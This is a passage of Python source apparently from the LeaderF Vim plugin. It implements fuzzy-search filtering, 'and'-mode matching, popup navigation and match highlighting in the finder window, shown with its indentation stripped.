if self._orig_line == line and (self._getInstance().buffer.options['modifiable']
or self._getInstance().getWinPos() in ('popup', 'floatwin')):
return False
self._orig_line = self._getInstance().currentLine
return True
def _getInstance(self):
if self._instance is None:
self._instance = LfInstance(self, self._getExplorer().getStlCategory(),
self._cli,
self._beforeEnter,
self._afterEnter,
self._beforeExit,
self._afterExit)
return self._instance
def _createHelpHint(self):
help = []
if not self._show_help:
if lfEval("get(g:, 'Lf_HideHelp', 0)") == '0':
help.append('" Press <F1> for help')
help.append('" ---------------------------------------------------------')
else:
help += self._createHelp()
self._help_length = len(help)
orig_row = self._getInstance().window.cursor[0]
if self._getInstance().isReverseOrder():
self._getInstance().buffer.options['modifiable'] = True
self._getInstance().buffer.append(help[::-1])
self._getInstance().buffer.options['modifiable'] = False
buffer_len = len(self._getInstance().buffer)
if buffer_len < self._initial_count:
if "--nowrap" not in self._arguments:
self._getInstance().window.height = min(self._initial_count,
self._getInstance()._actualLength(self._getInstance().buffer))
else:
self._getInstance().window.height = buffer_len
elif self._getInstance().window.height < self._initial_count:
self._getInstance().window.height = self._initial_count
lfCmd("normal! Gzb")
self._getInstance().window.cursor = (orig_row, 0)
else:
self._getInstance().buffer.options['modifiable'] = True
self._getInstance().buffer.append(help, 0)
self._getInstance().buffer.options['modifiable'] = False
self._getInstance().window.cursor = (orig_row + self._help_length, 0)
self._getInstance().mimicCursor()
self._getInstance().refreshPopupStatusline()
def _hideHelp(self):
self._getInstance().buffer.options['modifiable'] = True
if self._getInstance().isReverseOrder():
orig_row = self._getInstance().window.cursor[0]
countdown = len(self._getInstance().buffer) - orig_row - self._help_length
if self._help_length > 0:
del self._getInstance().buffer[-self._help_length:]
self._getInstance().buffer[:] = self._getInstance().buffer[-self._initial_count:]
lfCmd("normal! Gzb")
if 0 < countdown < self._initial_count:
self._getInstance().window.cursor = (len(self._getInstance().buffer) - countdown, 0)
else:
self._getInstance().window.cursor = (len(self._getInstance().buffer), 0)
self._getInstance().setLineNumber()
else:
del self._getInstance().buffer[:self._help_length]
if self._help_length > 0 and self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! %dk')" % (self._getInstance().getPopupWinId(), self._help_length))
self._help_length = 0
self._getInstance().refreshPopupStatusline()
def _inHelpLines(self):
if self._getInstance().isReverseOrder():
if self._getInstance().window.cursor[0] > len(self._getInstance().buffer) - self._help_length:
return True
elif self._getInstance().window.cursor[0] <= self._help_length:
return True
return False
def _getExplorer(self):
if self._explorer is None:
self._explorer = self._getExplClass()()
return self._explorer
def _resetAutochdir(self):
if int(lfEval("&autochdir")) == 1:
self._autochdir = 1
lfCmd("set noautochdir")
else:
self._autochdir = 0
def _setAutochdir(self):
if self._autochdir == 1:
# When autochdir is set, Vim will change the current working directory
# to the directory containing the file which was opened or selected.
lfCmd("set autochdir")
def _toUpInPopup(self):
if self._preview_winid > 0 and int(lfEval("winbufnr(%d)" % self._preview_winid)) != -1:
if lfEval("has('nvim')") == '1':
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd("norm! k")
lfCmd("redraw")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
else:
lfCmd("call win_execute(%d, 'norm! k')" % (self._preview_winid))
def _toDownInPopup(self):
if self._preview_winid > 0 and int(lfEval("winbufnr(%d)" % self._preview_winid)) != -1:
if lfEval("has('nvim')") == '1':
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd("norm! j")
lfCmd("redraw")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
else:
lfCmd("call win_execute(%d, 'norm! j')" % (self._preview_winid))
def _toUp(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! k')" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
adjust = False
if self._getInstance().isReverseOrder() and self._getInstance().getCurrentPos()[0] == 1:
adjust = True
self._setResultContent()
if self._cli.pattern and self._cli.isFuzzy \
and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \
and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")):
self._highlight_method()
lfCmd("norm! k")
if adjust:
lfCmd("norm! zt")
self._getInstance().setLineNumber()
lfCmd("setlocal cursorline!") # these two help to redraw the statusline,
lfCmd("setlocal cursorline!") # also fix a weird bug of vim
def _toDown(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! j')" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
if not self._getInstance().isReverseOrder() \
and self._getInstance().getCurrentPos()[0] == self._getInstance().window.height:
self._setResultContent()
lfCmd("norm! j")
self._getInstance().setLineNumber()
lfCmd("setlocal cursorline!") # these two help to redraw the statusline,
lfCmd("setlocal cursorline!") # also fix a weird bug of vim
def _pageUp(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, 'exec "norm! \<PageUp>"')""" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
if self._getInstance().isReverseOrder():
self._setResultContent()
if self._cli.pattern and self._cli.isFuzzy \
and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \
and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")):
self._highlight_method()
lfCmd('exec "norm! \<PageUp>"')
self._getInstance().setLineNumber()
def _pageDown(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, 'exec "norm! \<PageDown>"')""" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
if not self._getInstance().isReverseOrder():
self._setResultContent()
lfCmd('exec "norm! \<PageDown>"')
self._getInstance().setLineNumber()
def _leftClick(self):
if self._getInstance().getWinPos() == 'popup':
if int(lfEval("has('patch-8.1.2266')")) == 1:
if self._getInstance().getPopupWinId() == int(lfEval("v:mouse_winid")):
lfCmd("""call win_execute(%d, "exec v:mouse_lnum")"""
% (self._getInstance().getPopupWinId()))
lfCmd("""call win_execute(%d, "exec 'norm!'.v:mouse_col.'|'")"""
% (self._getInstance().getPopupWinId()))
exit_loop = False
elif self._getInstance().window.number == int(lfEval("v:mouse_win")):
lfCmd("exec v:mouse_lnum")
lfCmd("exec 'norm!'.v:mouse_col.'|'")
self._getInstance().setLineNumber()
self.clearSelections()
exit_loop = False
elif self._preview_winid == int(lfEval("v:mouse_winid")):
if lfEval("has('nvim')") == '1':
lfCmd("call win_gotoid(%d)" % self._preview_winid)
lfCmd("exec v:mouse_lnum")
lfCmd("exec 'norm!'.v:mouse_col.'|'")
self._current_mode = 'NORMAL'
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')"
% (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
exit_loop = True
else:
self.quit()
exit_loop = True
return exit_loop
def _search(self, content, is_continue=False, step=0):
if not is_continue:
self.clearSelections()
self._clearHighlights()
self._clearHighlightsPos()
self._cli.highlightMatches()
if not self._cli.pattern: # e.g., when <BS> or <Del> is typed
if self._empty_query and self._getExplorer().getStlCategory() in ["File"]:
self._guessSearch(self._content)
else:
self._getInstance().setBuffer(content[:self._initial_count])
self._getInstance().setStlResultsCount(len(content), True)
self._result_content = []
self._previewResult(False)
return
if self._cli.isFuzzy:
self._fuzzySearch(content, is_continue, step)
else:
self._regexSearch(content, is_continue, step)
self._previewResult(False)
def _filter(self, step, filter_method, content, is_continue,
use_fuzzy_engine=False, return_index=False):
""" Construct a list from result of filter_method(content).
Args:
step: An integer to indicate the number of lines to filter one time.
filter_method: A function to apply `content` as parameter and
return an iterable.
content: The list to be filtered.
"""
unit = self._getUnit()
step = step // unit * unit
length = len(content)
if self._index == 0:
self._cb_content = []
self._result_content = []
self._index = min(step, length)
cur_content = content[:self._index]
else:
if not is_continue and self._result_content:
if self._cb_content:
self._cb_content += self._result_content
else:
self._cb_content = self._result_content
if len(self._cb_content) >= step:
cur_content = self._cb_content[:step]
self._cb_content = self._cb_content[step:]
else:
cur_content = self._cb_content
left = step - len(self._cb_content)
self._cb_content = []
if self._index < length:
end = min(self._index + left, length)
cur_content += content[self._index:end]
self._index = end
if self._cli.isAndMode:
result, highlight_methods = filter_method(cur_content)
if is_continue:
self._previous_result = (self._previous_result[0] + result[0],
self._previous_result[1] + result[1])
result = self._previous_result
else:
self._previous_result = result
return (result, highlight_methods)
elif use_fuzzy_engine:
if return_index:
mode = 0 if self._cli.isFullPath else 1
tmp_content = [self._getDigest(line, mode) for line in cur_content]
result = filter_method(source=tmp_content)
result = (result[0], [cur_content[i] for i in result[1]])
else:
result = filter_method(source=cur_content)
if is_continue:
result = fuzzyEngine.merge(self._previous_result, result)
self._previous_result = result
else:
result = list(filter_method(cur_content))
if is_continue:
self._previous_result += result
result = self._previous_result
else:
self._previous_result = result
return result
def _fuzzyFilter(self, is_full_path, get_weight, iterable):
"""
return a list, each item is a pair (weight, line)
"""
getDigest = partial(self._getDigest, mode=0 if is_full_path else 1)
pairs = ((get_weight(getDigest(line)), line) for line in iterable)
MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT
return (p for p in pairs if p[0] > MIN_WEIGHT)
def _fuzzyFilterEx(self, is_full_path, get_weight, iterable):
"""
return a tuple, (weights, indices)
"""
getDigest = partial(self._getDigest, mode=0 if is_full_path else 1)
if self._getUnit() > 1: # currently, only BufTag's _getUnit() is 2
iterable = itertools.islice(iterable, 0, None, self._getUnit())
pairs = ((get_weight(getDigest(line)), i) for i, line in enumerate(iterable))
MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT
result = [p for p in pairs if p[0] > MIN_WEIGHT]
if len(result) == 0:
weights, indices = [], []
else:
weights, indices = zip(*result)
return (list(weights), list(indices))
def _refineFilter(self, first_get_weight, get_weight, iterable):
getDigest = self._getDigest
triples = ((first_get_weight(getDigest(line, 1)),
get_weight(getDigest(line, 2)), line)
for line in iterable)
MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT
return ((i[0] + i[1], i[2]) for i in triples if i[0] > MIN_WEIGHT and i[1] > MIN_WEIGHT)
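# And-mode filtering: self._cli.pattern is a list of sub-patterns (LeaderF's
# "and" mode, typically entered by separating patterns with spaces); every
# sub-pattern is matched in turn, the surviving lines are intersected and
# the per-pattern weights are summed into one final weight per line.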
def _andModeFilter(self, iterable):
encoding = lfEval("&encoding")
cur_content = iterable
weight_lists = []
highlight_methods = []
for p in self._cli.pattern:
use_fuzzy_engine = False
if self._fuzzy_engine and isAscii(p) and self._getUnit() == 1: # currently, only BufTag's _getUnit() is 2
use_fuzzy_engine = True
pattern = fuzzyEngine.initPattern(p)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=False, sort_results=False, is_and_mode=True)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Tag", "Rg", "Filetype",
"Command", "Window", "QuickFix", "LocList"]:
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=False, is_and_mode=True)
else:
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=not self._cli.isFullPath, sort_results=False, is_and_mode=True)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=not self._cli.isFullPath)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, True, clear=False)
elif is_fuzzyMatch_C and isAscii(p):
pattern = fuzzyMatchC.initPattern(p)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False)
else:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True)
filter_method = partial(self._fuzzyFilterEx, self._cli.isFullPath, getWeight)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, clear=False)
else:
fuzzy_match = FuzzyMatch(p, encoding)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
filter_method = partial(self._fuzzyFilterEx,
self._cli.isFullPath,
fuzzy_match.getWeight2)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Tag", "Rg", "Filetype",
"Command", "Window", "QuickFix", "LocList"]:
filter_method = partial(self._fuzzyFilterEx,
self._cli.isFullPath,
fuzzy_match.getWeight3)
else:
filter_method = partial(self._fuzzyFilterEx,
self._cli.isFullPath,
fuzzy_match.getWeight)
highlight_method = partial(self._highlight,
self._cli.isFullPath,
fuzzy_match.getHighlights,
clear=False)
if use_fuzzy_engine:
mode = 0 if self._cli.isFullPath else 1
tmp_content = [self._getDigest(line, mode) for line in cur_content]
result = filter_method(source=tmp_content)
else:
result = filter_method(cur_content)
for i, wl in enumerate(weight_lists):
weight_lists[i] = [wl[j] for j in result[1]]
weight_lists.append(result[0])
if self._getUnit() > 1: # currently, only BufTag's _getUnit() is 2
unit = self._getUnit()
result_content = [cur_content[i*unit:i*unit + unit] for i in result[1]]
cur_content = list(itertools.chain.from_iterable(result_content))
else:
cur_content = [cur_content[i] for i in result[1]]
result_content = cur_content
highlight_methods.append(highlight_method)
weights = [sum(i) for i in zip(*weight_lists)]
return ((weights, result_content), highlight_methods)
def _fuzzySearch(self, content, is_continue, step):
encoding = lfEval("&encoding")
use_fuzzy_engine = False
use_fuzzy_match_c = False
do_sort = "--no-sort" not in self._arguments
if self._cli.isAndMode:
filter_method = self._andModeFilter
elif self._cli.isRefinement:
if self._cli.pattern[1] == '': # e.g. abc;
if self._fuzzy_engine and isAscii(self._cli.pattern[0]):
use_fuzzy_engine = True
return_index = True
pattern = fuzzyEngine.initPattern(self._cli.pattern[0])
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=True, sort_results=do_sort)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=True)
highlight_method = partial(self._highlight, True, getHighlights, True)
elif is_fuzzyMatch_C and isAscii(self._cli.pattern[0]):
use_fuzzy_match_c = True
pattern = fuzzyMatchC.initPattern(self._cli.pattern[0])
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True)
filter_method = partial(self._fuzzyFilter, False, getWeight)
highlight_method = partial(self._highlight, False, getHighlights)
else:
fuzzy_match = FuzzyMatch(self._cli.pattern[0], encoding)
if "--no-sort" in self._arguments:
getWeight = fuzzy_match.getWeightNoSort
else:
getWeight = fuzzy_match.getWeight
getHighlights = fuzzy_match.getHighlights
filter_method = partial(self._fuzzyFilter, False, getWeight)
highlight_method = partial(self._highlight, False, getHighlights)
elif self._cli.pattern[0] == '': # e.g. ;abc
if self._fuzzy_engine and isAscii(self._cli.pattern[1]):
use_fuzzy_engine = True
return_index = True
pattern = fuzzyEngine.initPattern(self._cli.pattern[1])
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=False, sort_results=do_sort)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=False)
highlight_method = partial(self._highlight, True, getHighlights, True)
elif is_fuzzyMatch_C and isAscii(self._cli.pattern[1]):
use_fuzzy_match_c = True
pattern = fuzzyMatchC.initPattern(self._cli.pattern[1])
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False)
filter_method = partial(self._fuzzyFilter, True, getWeight)
highlight_method = partial(self._highlight, True, getHighlights)
else:
fuzzy_match = FuzzyMatch(self._cli.pattern[1], encoding)
if "--no-sort" in self._arguments:
getWeight = fuzzy_match.getWeightNoSort
else:
getWeight = fuzzy_match.getWeight
getHighlights = fuzzy_match.getHighlights
filter_method = partial(self._fuzzyFilter, True, getWeight)
highlight_method = partial(self._highlight, True, getHighlights)
else: # e.g. abc;def
if is_fuzzyMatch_C and isAscii(self._cli.pattern[0]):
is_ascii_0 = True
pattern_0 = fuzzyMatchC.initPattern(self._cli.pattern[0])
getWeight_0 = partial(fuzzyMatchC.getWeight, pattern=pattern_0, is_name_only=True)
getHighlights_0 = partial(fuzzyMatchC.getHighlights, pattern=pattern_0, is_name_only=True)
else:
is_ascii_0 = False
fuzzy_match_0 = FuzzyMatch(self._cli.pattern[0], encoding)
if "--no-sort" in self._arguments:
getWeight_0 = fuzzy_match_0.getWeightNoSort
else:
getWeight_0 = fuzzy_match_0.getWeight
getHighlights_0 = fuzzy_match_0.getHighlights
if is_fuzzyMatch_C and isAscii(self._cli.pattern[1]):
is_ascii_1 = True
pattern_1 = fuzzyMatchC.initPattern(self._cli.pattern[1])
getWeight_1 = partial(fuzzyMatchC.getWeight, pattern=pattern_1, is_name_only=False)
getHighlights_1 = partial(fuzzyMatchC.getHighlights, pattern=pattern_1, is_name_only=False)
else:
is_ascii_1 = False
fuzzy_match_1 = FuzzyMatch(self._cli.pattern[1], encoding)
if "--no-sort" in self._arguments:
getWeight_1 = fuzzy_match_1.getWeightNoSort
else:
getWeight_1 = fuzzy_match_1.getWeight
getHighlights_1 = fuzzy_match_1.getHighlights
use_fuzzy_match_c = is_ascii_0 and is_ascii_1
filter_method = partial(self._refineFilter, getWeight_0, getWeight_1)
highlight_method = partial(self._highlightRefine, getHighlights_0, getHighlights_1)
else:
if self._fuzzy_engine and isAscii(self._cli.pattern) and self._getUnit() == 1: # currently, only BufTag's _getUnit() is 2
use_fuzzy_engine = True
pattern = fuzzyEngine.initPattern(self._cli.pattern)
if self._getExplorer().getStlCategory() == "File":
return_index = False
if self._cli.isFullPath:
filter_method = partial(fuzzyEngine.fuzzyMatch, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=False, sort_results=do_sort)
else:
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_File,
param=fuzzyEngine.createParameter(1),
is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() == "Rg":
return_index = False
if "--match-path" in self._arguments:
filter_method = partial(fuzzyEngine.fuzzyMatch, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=do_sort)
else:
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_Rg,
param=fuzzyEngine.createRgParameter(self._getExplorer().displayMulti(),
self._getExplorer().getContextSeparator(), self._has_column),
is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() == "Tag":
return_index = False
mode = 0 if self._cli.isFullPath else 1
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_Tag,
param=fuzzyEngine.createParameter(mode), is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() == "Gtags":
return_index = False
result_format = 1
if self._getExplorer().getResultFormat() in [None, "ctags-mod"]:
result_format = 0
elif self._getExplorer().getResultFormat() == "ctags-x":
result_format = 2
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_Gtags,
param=fuzzyEngine.createGtagsParameter(0, result_format, self._match_path),
is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() == "Line":
return_index = False
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_Line,
param=fuzzyEngine.createParameter(1), is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Filetype",
"Command", "Window", "QuickFix", "LocList"]:
return_index = True
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=do_sort)
else:
return_index = True
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=not self._cli.isFullPath, sort_results=do_sort)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=not self._cli.isFullPath)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, True)
elif is_fuzzyMatch_C and isAscii(self._cli.pattern):
use_fuzzy_match_c = True
pattern = fuzzyMatchC.initPattern(self._cli.pattern)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False)
else:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True)
filter_method = partial(self._fuzzyFilter, self._cli.isFullPath, getWeight)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights)
else:
fuzzy_match = FuzzyMatch(self._cli.pattern, encoding)
if "--no-sort" in self._arguments:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeightNoSort)
elif self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeight2)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Rg", "Filetype",
"Command", "Window", "QuickFix", "LocList"]:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeight3)
else:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeight)
highlight_method = partial(self._highlight,
self._cli.isFullPath,
fuzzy_match.getHighlights)
if self._cli.isAndMode:
if self._fuzzy_engine and isAscii(''.join(self._cli.pattern)):
step = 20000 * cpu_count
else:
step = 10000
pair, highlight_methods = self._filter(step, filter_method, content, is_continue)
if do_sort:
pairs = sorted(zip(*pair), key=operator.itemgetter(0), reverse=True)
self._result_content = self._getList(pairs)
else:
self._result_content = pair[1]
elif use_fuzzy_engine:
if step == 0:
if return_index:
step = 30000 * cpu_count
else:
step = 60000 * cpu_count
_, self._result_content = self._filter(step, filter_method, content, is_continue, True, return_index)
else:
if step == 0:
if use_fuzzy_match_c:
step = 60000
elif self._getExplorer().supportsNameOnly() and self._cli.isFullPath:
step = 6000
else:
step = 12000
pairs = self._filter(step, filter_method, content, is_continue)
if "--no-sort" not in self._arguments:
pairs.sort(key=operator.itemgetter(0), reverse=True)
self._result_content = self._getList(pairs)
self._getInstance().setBuffer(self._result_content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._result_content), True)
if self._cli.isAndMode:
self._highlight_method = partial(self._highlight_and_mode, highlight_methods)
self._highlight_method()
else:
self._highlight_method = highlight_method
self._highlight_method()
if len(self._cli.pattern) > 1 and not is_continue:
lfCmd("redraw")
def _guessFilter(self, filename, suffix, dirname, icon, iterable):
"""
return a list, each item is a pair (weight, line)
"""
icon_len = len(icon)
return ((FuzzyMatch.getPathWeight(filename, suffix, dirname, line[icon_len:]), line) for line in iterable)
def _guessSearch(self, content, is_continue=False, step=0):
if self._cur_buffer.name == '' or self._cur_buffer.options["buftype"] not in [b'', '']:
self._getInstance().setBuffer(content[:self._initial_count])
self._getInstance().setStlResultsCount(len(content), True)
self._result_content = []
return
buffer_name = os.path.normpath(lfDecode(self._cur_buffer.name))
if lfEval("g:Lf_ShowRelativePath") == '1':
try:
buffer_name = os.path.relpath(buffer_name)
except ValueError:
pass
buffer_name = lfEncode(buffer_name)
dirname, basename = os.path.split(buffer_name)
filename, suffix = os.path.splitext(basename)
if lfEval("get(g:, 'Lf_ShowDevIcons', 1)") == "1":
icon = webDevIconsGetFileTypeSymbol(basename)
else:
icon = ''
if self._fuzzy_engine:
filter_method = partial(fuzzyEngine.guessMatch, engine=self._fuzzy_engine, filename=filename,
suffix=suffix, dirname=dirname, icon=icon, sort_results=True)
step = len(content)
_, self._result_content = self._filter(step, filter_method, content, is_continue, True)
else:
step = len(content)
filter_method = partial(self._guessFilter, filename, suffix, dirname, icon)
pairs = self._filter(step, filter_method, content, is_continue)
pairs.sort(key=operator.itemgetter(0), reverse=True)
self._result_content = self._getList(pairs)
self._getInstance().setBuffer(self._result_content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._result_content), True)
def _highlight_and_mode(self, highlight_methods):
self._clearHighlights()
for i, highlight_method in enumerate(highlight_methods):
highlight_method(hl_group='Lf_hl_match' + str(i % 5))
def _clearHighlights(self):
if self._getInstance().getWinPos() == 'popup':
for i in self._highlight_ids:
lfCmd("silent! call matchdelete(%d, %d)" % (i, self._getInstance().getPopupWinId()))
else:
for i in self._highlight_ids:
lfCmd("silent! call matchdelete(%d)" % i)
self._highlight_ids = []
def _clearHighlightsPos(self):
self._highlight_pos = []
self._highlight_pos_list = []
self._highlight_refine_pos = []
def _resetHighlights(self):
self._clearHighlights()
unit = self._getUnit()
bottom = len(self._getInstance().buffer) - self._help_length
if self._cli.isAndMode:
highlight_pos_list = self._highlight_pos_list
else:
highlight_pos_list = [self._highlight_pos]
for n, highlight_pos in enumerate(highlight_pos_list):
hl_group = 'Lf_hl_match' + str(n % 5)
for i, pos in enumerate(highlight_pos):
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('%s', %s)")"""
% (self._getInstance().getPopupWinId(), hl_group, str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('%s', %s)" % (hl_group, str(pos[j:j+8]))))
self._highlight_ids.append(id)
for i, pos in enumerate(self._highlight_refine_pos):
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('Lf_hl_matchRefine', %s)")"""
% (self._getInstance().getPopupWinId(), str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('Lf_hl_matchRefine', %s)" % str(pos[j:j+8])))
self._highlight_ids.append(id)
def _highlight(self, is_full_path, get_highlights, use_fuzzy_engine=False, clear=True, hl_group='Lf_hl_match'):
# matchaddpos() is introduced by Patch 7.4.330
if (lfEval("exists('*matchaddpos')") == '0' or
lfEval("g:Lf_HighlightIndividual") == '0'):
return
cb = self._getInstance().buffer
if self._getInstance().empty(): # buffer is empty.
return
highlight_number = int(lfEval("g:Lf_NumberOfHighlight"))
if clear:
self._clearHighlights()
getDigest = partial(self._getDigest, mode=0 if is_full_path else 1)
unit = self._getUnit()
if self._getInstance().isReverseOrder():
if self._help_length > 0:
content = cb[:-self._help_length][::-1]
else:
content = cb[:][::-1]
else:
content = cb[self._help_length:]
if use_fuzzy_engine:
self._highlight_pos = get_highlights(source=[getDigest(line)
for line in content[:highlight_number:unit]])
else:
# e.g., self._highlight_pos = [ [ [2,3], [6,2] ], [ [1,4], [7,6], ... ], ... ]
# where [2, 3] indicates the highlight starts at the 2nd column with the
# length of 3 in bytes
self._highlight_pos = [get_highlights(getDigest(line))
for line in content[:highlight_number:unit]]
if self._cli.isAndMode:
self._highlight_pos_list.append(self._highlight_pos)
bottom = len(content)
for i, pos in enumerate(self._highlight_pos):
start_pos = self._getDigestStartPos(content[unit*i], 0 if is_full_path else 1)
if start_pos > 0:
for j in range(len(pos)):
pos[j][0] += start_pos
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('%s', %s)")"""
% (self._getInstance().getPopupWinId(), hl_group, str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('%s', %s)" % (hl_group, str(pos[j:j+8]))))
self._highlight_ids.append(id)
def _highlightRefine(self, first_get_highlights, get_highlights):
# matchaddpos() is introduced by Patch 7.4.330
if (lfEval("exists('*matchaddpos')") == '0' or
lfEval("g:Lf_HighlightIndividual") == '0'):
return
cb = self._getInstance().buffer
if self._getInstance().empty(): # buffer is empty.
return
highlight_number = int(lfEval("g:Lf_NumberOfHighlight"))
self._clearHighlights()
getDigest = self._getDigest
unit = self._getUnit()
if self._getInstance().isReverseOrder():
if self._help_length > 0:
content = cb[:-self._help_length][::-1]
else:
content = cb[:][::-1]
else:
content = cb[self._help_length:]
bottom = len(content)
